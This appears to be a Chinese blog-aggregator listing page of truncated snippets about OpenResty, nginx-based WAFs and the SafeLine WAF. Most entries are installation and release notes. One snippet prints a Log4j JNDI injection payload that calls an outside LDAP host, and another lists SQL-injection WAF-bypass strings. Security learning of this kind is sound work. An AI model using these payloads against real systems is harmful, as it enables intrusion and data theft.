openresty waf
openresty 1.25.3.1 发布了
就在最近openresty 发布了1.25.3.1 版本,基于了当前nginx 最新版本(1.25.3) 核心特性 nginx 基于了当前最新版本 支持pcre2 支持http3 说明 目前来看openresty 更新迭代还是很不错的,一直在持续更新 参考资料 https://openresty.o ......
idea+OpenResty
1、安装OpenResty 2、IDEA插件 Lua,nginx Support,OpenResty Lua Support ant 发布运行 3、创建lua项目 3.1) 创建conf\nginx.conf 内容如下: worker_processes 1;error_log logs/error ......
Debian12 (雷池WAF SafeLine)通过 EUI64 固定 IPv6 地址后缀、获取无状态 SLAAC
说明 Debian 12 (KDE 桌面)网络管理(IPv4、IPv6)已默认不再由 内核 直接管理,转而使用由 NetworkManager 管理。 若要固定 IPv6 后缀并实现 SLAAC 无状态管理,则需要修改 NetworkManager 配置。 图形界面配置网络 配置完成后,检查网络地址 ......
08信息打点-系统篇&端口扫描&CDN 服务&负载均衡&WAF 防火墙
一、获取网络信息-服务厂商&网络架构1、每个不同的厂商都有不同的防护策略,获取到厂商信息可以第一时间知道目标服务器的防护情况 2、理解外网和内网 外网,出口IP:171.40.78.83 内网:192.168.1.1 WEB 内网192.168.1.1可以直接访问外网,外网出口(交换机)做一个映射反 ......
OpenResty最佳实践
openresty官方文档 http://openresty.org/cn/linux-packages.html#ubuntu 概念和应用场景 https://blog.csdn.net/u014079773/article/details/101421663 openresty配置与实战 htt ......
【网关开发】Openresty使用cosocket API 发送http与tcp网络请求
背景 为网关提供健康检查功能时需要对节点发送http或者tcp探活请求。Openresty 提供cosocket来处理非阻塞IO。 实现 跟工程结合在一起,这里简单拼接数据结构 local function __default_check_alive(status) return status >= ......
modSecurity nginx waf
OSI(开放系统互联) 是最常被网络相关讨论引用的网络流量框架之一。当数据包通过第 6 层(表示层)移动到第 7 层(应用层)时,它会进行解密或解码操作。这些操作可能会因异常解码和解释而产生漏洞,而这些漏洞可能被利用来打破标准应用上下文。注入就是这种漏洞的一种类型,而且因为传统的 IDS/IPS 设 ......
ubuntu 22.04.1安装雷池开源waf应用防火墙
ubuntu 22.04.1安装雷池开源waf应用防火墙 雷池waf是开源应用防火墙,国内首创、业内领先的智能语义分析算法 官方网站:https://waf-ce.chaitin.cn/ 官方文档:https://waf-ce.chaitin.cn/docs/ 官方安装文档:https://waf- ......
05 基础入门——资产架构&端口&应用&WAF&站库分离&负载均衡
一、资产架构1、网站配置 (1)目录型网站安全 bbs.xiaodi8.com dz论坛 #该域名下有一套网站程序,dz论坛 bbs.xiaodi8.com/blog wp程序 #该域名的某个目录下也配置了一套网站程序 总结:一个网站,两个程序,其中任何一个程序出现漏洞,都可以进入安全测试(同一服务 ......
naxsi nginx 低规则维护的waf 扩展
naxsi nginx 低规则维护的waf 扩展,使用了libpcre 以及libinjection 工具,核心主要是处理xss 以及sql 注入类型的处理 说明 基于nginx 的开源waf 还是比较多的,naxsi 做为一个工具,可以尝试下 参考资料 https://github.com/war ......
openresty动态解析域名
废话不多说直接上代码 user nobody; worker_processes auto; #error_log logs/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; #pid logs/ ......
见证雷池成为 GitHub 全球第一的 WAF 项目
雷池(SafeLine)是长亭科技耗时近 10 年打造的 WAF,由长亭独创的智能语义分析算法驱动。
雷池与开源社区
早在 2016 年,长亭就开源了雷池的语义分析算法自动机引擎,后续又陆续开源了雷池相关风控插件的和引擎通信协议。
雷池的商业版本自发布以后就受到各大咨询机构和诸多头部企业的认可,虽... ......
见证雷池成为 GitHub 全球第一的 WAF 项目 ,(转自雷池微信公众号)
见证雷池成为 GitHub 全球第一的 WAF 项目 原创 雷池开发者团队 [CT Stack 安全社区](javascript:void(0)😉 2023-12-05 14:56 发表于浙江 雷池(SafeLine)是长亭科技耗时近 10 年打造的 WAF,由长亭独创的智能语义分析算法驱动。 雷 ......
Log4j一些WAF绕过技巧
0x00 前言 CVE-2021-44228 log4j:2.0 <= Apache log4j <= 2.14.1 patched of Java version:6u211+, 7u201+,8u191+, 11.0.1+ 基本Payload: ${jndi:ldap://dnslog.cn/a ......
雷池 WAF(SafeLine)异常处理:Web需要绑定动态口令,系统异常崩溃
说明 问题发生在2023年12月1日,突然发现安装的 雷池 WAF Web 需要重新绑定动态口令,但扫描二维码无法绑定。 当即检查防护站点服务正常,PVE Shell 访问正常。 查看 Issues · chaitin/SafeLine · GitHub ,发现已经有人提交了 Bug 。 [Bug] ......
什么是 WAF - Web Application Firewall
在我们深入探讨网络安全领域的多种技术和工具之前,让我们先理解一下 "WAF"。WAF 是 Web Application Firewall(网络应用防火墙)的缩写,它是一种保护 web 应用的特殊防火墙。WAF 旨在过滤、监控和阻止来自所有 HTTP 流量的恶意攻击。与传统的网络防火墙不同,WAF ......
Ubuntu部署雷池Waf社区版
安装docker环境 更新软件包 sudo apt update 安装docker环境 apt-get install docker.io docker -v 安装docker compose V2版本 该命令为$HOME目录下的活动用户安装Compose V2。为系统中的所有用户安装Docker ......
最新WAF信息收集技术
WAF的详细介绍将在第5章展开,本节针对WAF信息收集进行讲解。 目前,市面上的WAF大多都部署了云服务进行防护加固,让WAF的防护性能得到进一步提升。 图1-32所示为安全狗最新版服务界面,增加了“加入服云”选项。 图1-32 安全狗最新版服务界面,不仅加强了传统的WAF防护层,还增加了服云选项。 ......
openresty 1.21.4.3 发布
实际上openresty 比较早就发布openresty 1.21.4.3 版本了,只是周边的构建包,就在昨天才发布的,核心是解决了nginx 关于http2 处理的问题对于使用nginx 以及openresty 的同学比较推荐进行升级 参考资料 https://openresty.org/en/c ......
OpenResty环境下安装 lua-resty-auto-ssl 实现 HTTPS 证书的自动签发及续期
一. lua-resty-auto-ssl auto-ssl 是 OpenResty 环境下的一个模块,用来实现 Let's Encrypt 免费证书的签发和续期的自动化。 由于 Let's Encrypt 的证书有效期只有 90 天,往常每三个月就需要使用 CertBot 客户端进行续期操作。 有 ......
记一次yakit对雷池WAF社区版功能的测试
yakit界面 点击专项漏洞检测,输入服务器IP地址,选择thinkphp 8个漏洞插件 开打 我在服务器上部署了雷池WAF社区版,选择攻击时间点过滤出9条,本次所有攻击都被发现拦截。 致远OA10个漏洞插件,开始测试 筛选攻击时间,发现10个攻击全部告警并且百分之百发现拦截 结语:实测长亭-雷池W ......
Safeline开源免费的Web应用防火墙(WAF)
https://zhuanlan.zhihu.com/p/641742236 安装指南: 配置需求: 操作系统:Linux 指令架构:x86_64 软件依赖:Docker 20.10.6 或更高版本 软件依赖:Docker Compose 2.0.0 或更高版本 最小环境要求:1 核 CPU / 1 ......
WAF绕过
阿里云盾 (阿里服务器自带) 宝塔 安全狗 (免费,所以用的多,且历史久,但现在有些菜了) 更改提交方式 前提:支持其他方式提交后接收 增加特殊符号,有的增加后与原来的回显没有区别 混用注释 /**/ %23:# %0a:换行 eg. ?id=1 union%23a%0Aselect 1,2,3# ......
OpenResty入门之压测篇:压测工具界的 “悍马” wrk 审核中
在上篇文章 每个后端都应该了解的 OpenResty 入门以及网关安全实战 中,我向大家介绍了 OpenResty 的入门使用是 WAF 防御实战,这篇文章将给大家继续介绍 OpenResty 入门之性能测试 篇。 性能测试是软件开发中不可或缺的一环,它可以帮助我们评估系统的性能、稳定性、可扩展性等 ......
[雷池WAF]长亭雷池WAF配置基于健康监测的负载均衡,实现故障自动切换上游服务器
为了进一步加强我们的内网安全,我们在原有硬WAF的基础上,又在内网使用的社区版的雷池WAF,作为应用上层的软WAF。从而实现多WAF防护的架构。 经过进一步了解,发现雷池WAF的上游转发代理是基于Tengine的,所以我们萌生出了一个想法,就是让雷池既可以具备WAF的功能,又具备负载均衡和故障切换的 ......
每个后端都应该了解的OpenResty入门以及网关安全实战
简介 在官网上对 OpenResty 是这样介绍的(http://openresty.org): “OpenResty 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。用于方便地搭建能够处理超高并发、扩展性极高的动态 We ......
博学谷学习记录 自我总结 用心分享 | OpenResty中间件
1.什么是OpenResty OpenResty是一个基于Nginx与Lua的高性能Web平台,其内部集成了大量精良的Lua库、第三方模块以及大多数的依赖项。用于方便地搭建能够处理超高并发、扩展性极高的动态 Web 应用、Web 服务和动态网关。 OpenResty通过汇聚各种设计精良的Nginx模 ......
08:信息收集-架构,搭建,WAF等
前言:在安全测试中,信息收集是非常重要的一个环节,此环节的信息将影响到后续的成功几率,掌握信息的多少将决定发现漏洞机会大小,换言之决定着是否能完成目标的测试任务。也可以很直接的跟大家说:渗透测试的思路就是从信息收集这里开始,你与大牛的差距也是从这里开始的! 申明:涉及的网络真实目标只做技术分析,不做 ......
堡塔云WAF
添加流程图 域名解析(使用CDN) 使用CDN的情况下。 在堡塔云WAF后台,添加域名,填写源站IP; 在域名解析后台,别名解析到CDN服务商提供的CNAME不变,但回源地址改为堡塔云WAF的IP。 请求大致过程(使用CDN) 相当于比之前多了「请求堡塔云WAF」一个步骤。 请求CDN节点 官方页面 ......
openresty 安装 踩坑
mac安装 由于用brew安装,总是提示 openssl路径不存在,故手工安装 可以用官方的指导 https://openresty.org/cn/installation.html 就是注意下面的命令,如果报错,手动指定部分参数即可,"/usr/local/Cellar/openssl@1.1/1 ......